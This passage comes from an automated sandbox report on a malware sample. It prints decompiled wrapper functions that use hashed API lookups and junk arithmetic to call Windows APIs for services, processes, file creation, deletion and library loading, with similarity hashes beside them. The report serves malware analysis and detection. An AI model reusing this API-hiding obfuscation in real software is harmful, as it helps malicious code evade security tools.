                                          • Instruction Fuzzy Hash: DF0128B6941308FBEB45DF94DD06A9E7BB5EB18704F108188FA09661A0D3B25E20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E001EAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E001D602B(_t21);
                                          				_v12 = 0xcc49;
                                          				_v12 = _v12 << 6;
                                          				_v12 = _v12 >> 2;
                                          				_v12 = _v12 ^ 0x000ca988;
                                          				_v8 = 0x5d85;
                                          				_v8 = _v8 | 0xb9d19a55;
                                          				_v8 = _v8 * 0xd;
                                          				_v8 = _v8 ^ 0x6fa87272;
                                          				E001E07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                          				_t27 = DeleteFileW(_a12); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 001EAAA8
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: 6cc9e9da56f875ccb929634986dd8fabee2daaccf13b632fb616f58897090f90
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 20F019B590020CFFDF08DF94DD4A99EBFB5EB45304F108198F915A6250D3B69F549B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E001D5FB2(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E001D602B(_t21);
                                          				_v12 = 0x33d;
                                          				_v12 = _v12 + 0xc3dc;
                                          				_v12 = _v12 | 0x39ccfb02;
                                          				_v12 = _v12 ^ 0x39ccf342;
                                          				_v8 = 0xe8d9;
                                          				_v8 = _v8 * 0x16;
                                          				_v8 = _v8 | 0x4145347f;
                                          				_v8 = _v8 ^ 0x9035ef96;
                                          				_v8 = _v8 ^ 0xd1609914;
                                          				E001E07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                          				_t27 = CloseServiceHandle(_a4); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • CloseServiceHandle.ADVAPI32(39CCF342), ref: 001D6025
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2106652050.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true
                                          • Associated: 00000010.00000002.2106647421.00000000001D0000.00000004.00000001.sdmp
                                          • Associated: 00000010.00000002.2106669829.00000000001EC000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleService
                                          • String ID:
                                          • API String ID: 1725840886-0
                                          • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction ID: 21e3675d678c7d47ccde82411a3224adeb747ad6c423f1aa475c33c6d4e2ced6
                                          • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                          • Instruction Fuzzy Hash: 7DF04FB0C11208FFDB08DFA0E94689EBFB8EB54300F208198E409A7260E7B15F559F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Executed Functions

                                          C-Code - Quality: 62%
                                          			E00212959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t30;
                                          				void* _t39;
                                          				signed int _t41;
                                          				signed int _t42;
                                          
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(0);
                                          				_push(0);
                                          				E0021602B(_t30);
                                          				_v12 = 0x5e3c;
                                          				_t41 = 0x63;
                                          				_v12 = _v12 / _t41;
                                          				_t42 = 0x2f;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x000064be;
                                          				_v8 = 0x74da;
                                          				_v8 = _v8 | 0xfefeeaea;
                                          				_v8 = _v8 >> 0xc;
                                          				_v8 = _v8 ^ 0x000fb531;
                                          				E002207A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                          				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                          				return _t39;
                                          			}










                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002129DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: d406d96ca1e4ca2a5ce053f8c48229baa50acf6c46116ac46087fabbe791cae1
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: E3016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0021C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				void* _t29;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          
                                          				E0021602B(_t29);
                                          				_v28 = 0x4fe02f;
                                          				_v24 = 0x232390;
                                          				_v20 = 0xf8460;
                                          				_v16 = 0;
                                          				_v12 = 0xf625;
                                          				_v12 = _v12 >> 6;
                                          				_v12 = _v12 >> 0xa;
                                          				_v12 = _v12 + 0xffffcc6f;
                                          				_v12 = _v12 ^ 0xffffa5b6;
                                          				_v8 = 0xe5cd;
                                          				_v8 = _v8 + 0xffffae4d;
                                          				_v8 = _v8 | 0xf8bbefe7;
                                          				_v8 = _v8 ^ 0xf8bbcc9a;
                                          				_t33 = E002207A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                          				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                          				return _t34;
                                          			}













                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0021C762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: 368e049acd3fbf82153a8d53a9143e92210354e00549e693d66a1729611a1674
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: AD1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 82%
                                          			E00211000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				void* _t33;
                                          				struct HINSTANCE__* _t40;
                                          				signed int _t42;
                                          
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				E0021602B(_t33);
                                          				_v16 = _v16 & 0x00000000;
                                          				_v24 = 0x1b2eda;
                                          				_v20 = 0x33a3b7;
                                          				_v12 = 0x98c;
                                          				_v12 = _v12 + 0xb426;
                                          				_v12 = _v12 + 0x5beb;
                                          				_t42 = 0x63;
                                          				_v12 = _v12 / _t42;
                                          				_v12 = _v12 ^ 0x00000fce;
                                          				_v8 = 0x120e;
                                          				_v8 = _v8 + 0xfffffcb8;
                                          				_v8 = _v8 + 0xffffefaa;
                                          				_v8 = _v8 >> 5;
                                          				_v8 = _v8 ^ 0x07ff9a02;
                                          				E002207A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                          				_t40 = LoadLibraryW(_a12); // executed
                                          				return _t40;
                                          			}












                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 00211096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 542211732888673dd6bd4a999da95d67d8dd94142be1235f0600662faada698f
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: 5B015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00214859() {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          
                                          				_v12 = 0xafe2;
                                          				_v12 = _v12 * 0x42;
                                          				_v12 = _v12 + 0xffffdd89;
                                          				_v12 = _v12 ^ 0x002d198d;
                                          				_v8 = 0x5b09;
                                          				_v8 = _v8 | 0xa1ea9544;
                                          				_v8 = _v8 * 0x12;
                                          				_v8 = _v8 ^ 0x6283d9c1;
                                          				E002207A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
                                          				ExitProcess(0);
                                          			}







                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002148B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: f34ee4eb2b485e945288599d497fbdc208df6c84720c6139dbff6cf129befafa
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 8CF017B0A15209FBDB04CFE8DA9699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 66%
                                          			E00224F7D(void* __ecx, void* __edx, void* _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t17;
                                          				int _t24;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t17);
                                          				_v12 = 0xddd8;
                                          				_v12 = _v12 * 0x48;
                                          				_v12 = _v12 ^ 0x003e66d8;
                                          				_v8 = 0xcb35;
                                          				_v8 = _v8 ^ 0x7b88573c;
                                          				_v8 = _v8 * 0x59;
                                          				_v8 = _v8 ^ 0xf27e4a21;
                                          				E002207A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                          				_t24 = CloseHandle(_a4); // executed
                                          				return _t24;
                                          			}








                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 00224FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: de85189ff0f10b7205e5618a1194342d1679db1f64d43c2e98040568b64fecc1
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: 8BF037B081120CFFDB04DFA4D98689EBFBAEB44300F208199E804AB250D3715B509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 21%
                                          			E0022976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t34;
                                          				int _t39;
                                          				struct _PROCESS_INFORMATION* _t48;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t48 = __edx;
                                          				_push(0);
                                          				_push(_a68);
                                          				_push(0);
                                          				_push(_a60);
                                          				_push(_a56);
                                          				_push(_a52);
                                          				_push(0);
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(0);
                                          				_push(0);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(_a20);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E0021602B(_t34);
                                          				_v12 = 0xaff9;
                                          				_v12 = _v12 | 0xcee54bd1;
                                          				_v12 = _v12 + 0x6ed6;
                                          				_v12 = _v12 ^ 0xcee61221;
                                          				_v8 = 0x6229;
                                          				_v8 = _v8 ^ 0x42aa9f31;
                                          				_v8 = _v8 >> 2;
                                          				_v8 = _v8 ^ 0x10aad83f;
                                          				E002207A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
                                          				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
                                          				return _t39;
                                          			}









                                          APIs
                                          • CreateProcessW.KERNEL32(0021591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0021591A), ref: 00229816
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 8af8b585893f82bc15f7c07b0853e93990054816491876dc31458a1a35a57156
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 8111B372911148BBDF199FD6DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E0021B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t32;
                                          				void* _t38;
                                          				long _t47;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a48);
                                          				_t47 = __edx;
                                          				_push(_a44);
                                          				_push(_a40);
                                          				_push(_a36);
                                          				_push(_a32);
                                          				_push(_a28);
                                          				_push(_a24);
                                          				_push(0);
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(0);
                                          				E0021602B(_t32);
                                          				_v8 = 0xfd14;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 * 0x7a;
                                          				_v8 = _v8 >> 9;
                                          				_v8 = _v8 ^ 0x00002bef;
                                          				_v12 = 0x4f26;
                                          				_v12 = _v12 | 0xe7e97f76;
                                          				_v12 = _v12 ^ 0xe7e94dbb;
                                          				E002207A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                          				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                          				return _t38;
                                          			}









                                          APIs
                                          • CreateFileW.KERNELBASE(00220668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00220668,?,?,?,?), ref: 0021B5FD
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 8c5b0151ff509629f37df0858bbc5671548eea907959aa7da7d1092e1be52d2d
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 4211C372801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862120D3729A60EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 54%
                                          			E0022981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t22;
                                          				void* _t28;
                                          				void* _t34;
                                          				long _t37;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a16);
                                          				_t34 = __edx;
                                          				_t37 = __ecx;
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__edx);
                                          				_push(__ecx);
                                          				E0021602B(_t22);
                                          				_v12 = 0xe68;
                                          				_v12 = _v12 * 0x39;
                                          				_v12 = _v12 ^ 0xd1b1d871;
                                          				_v12 = _v12 ^ 0xd1b2fb7e;
                                          				_v8 = 0x629e;
                                          				_v8 = _v8 + 0xfffff5da;
                                          				_v8 = _v8 | 0xbef7b77b;
                                          				_v8 = _v8 ^ 0xbef79fc3;
                                          				E002207A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                          				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                          				return _t28;
                                          			}










                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002187F2,0000CAAE,0000510C,AD82F196), ref: 0022989B
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: 136ff4b73406eac4840e75f5a7c5c464a2f8124889a7d21b5cd232603915ad96
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: C2014876801208BBDB04EFD5D8468DFBFB9EF85750F108199F918A6220E6715A619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 62%
                                          			E00227BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				int _t31;
                                          				signed int _t33;
                                          				struct _SHFILEOPSTRUCTW* _t40;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_t40 = __ecx;
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t24);
                                          				_v8 = 0xa117;
                                          				_t33 = 0x76;
                                          				_v8 = _v8 / _t33;
                                          				_v8 = _v8 >> 4;
                                          				_v8 = _v8 ^ 0x210fe703;
                                          				_v8 = _v8 ^ 0x210fdcea;
                                          				_v12 = 0xf1e9;
                                          				_v12 = _v12 << 9;
                                          				_v12 = _v12 ^ 0x01e3a445;
                                          				E002207A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
                                          				_t31 = SHFileOperationW(_t40); // executed
                                          				return _t31;
                                          			}










                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00227C67
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 4506c20672cf2cf3caec14a6ca0a9d6c1bf7f964dc28c20fa5fa43f13956cead
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: 7E014FB190120CFFEB09DF94D84A8DEBBB5EF44314F108198F40567240E7B15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E0021F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
                                          				unsigned int _v8;
                                          				signed int _v12;
                                          				void* _t24;
                                          				void* _t29;
                                          				int _t35;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a20);
                                          				_t35 = __ecx;
                                          				_push(_a16);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t24);
                                          				_v12 = 0xd5a7;
                                          				_v12 = _v12 ^ 0x994cba9d;
                                          				_v12 = _v12 ^ 0x994c19d3;
                                          				_v8 = 0xac88;
                                          				_v8 = _v8 << 3;
                                          				_v8 = _v8 >> 8;
                                          				_v8 = _v8 + 0xebed;
                                          				_v8 = _v8 ^ 0x0000ab82;
                                          				E002207A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
                                          				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
                                          				return _t29;
                                          			}









                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0021F6D8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: 106e2d8713a64ed87b02e2ca2f7615aa113f59112c714e2c671415f888782640
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 9B01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25E61DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0021B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t23;
                                          				intOrPtr* _t27;
                                          				void* _t28;
                                          
                                          				E0021602B(_t23);
                                          				_v12 = 0x9431;
                                          				_v12 = _v12 >> 7;
                                          				_v12 = _v12 ^ 0x0000160f;
                                          				_v8 = 0xc972;
                                          				_v8 = _v8 ^ 0x829e0126;
                                          				_v8 = _v8 + 0x4512;
                                          				_v8 = _v8 + 0xffff18f9;
                                          				_v8 = _v8 ^ 0x829e24c1;
                                          				_t27 = E002207A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
                                          				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
                                          				return _t28;
                                          			}









                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0021B759
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 82f69c0fac6d70267d21593f0c3ff8349d879125f3defbce7c14a7de5816fdb4
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 150178B2940308FBEB45DF90DD06A9E7BB5EB18704F108188FA09261A0D3B25A20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E0022AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                          				signed int _v8;
                                          				unsigned int _v12;
                                          				void* _t21;
                                          				int _t27;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_push(_a12);
                                          				_push(_a8);
                                          				_push(_a4);
                                          				_push(__ecx);
                                          				E0021602B(_t21);
                                          				_v12 = 0xcc49;
                                          				_v12 = _v12 << 6;
                                          				_v12 = _v12 >> 2;
                                          				_v12 = _v12 ^ 0x000ca988;
                                          				_v8 = 0x5d85;
                                          				_v8 = _v8 | 0xb9d19a55;
                                          				_v8 = _v8 * 0xd;
                                          				_v8 = _v8 ^ 0x6fa87272;
                                          				E002207A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                          				_t27 = DeleteFileW(_a12); // executed
                                          				return _t27;
                                          			}








                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0022AAA8
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.2110599101.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000011.00000002.2110585240.0000000000210000.00000004.00000001.sdmp
                                          • Associated: 00000011.00000002.2110685458.000000000022C000.00000004.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
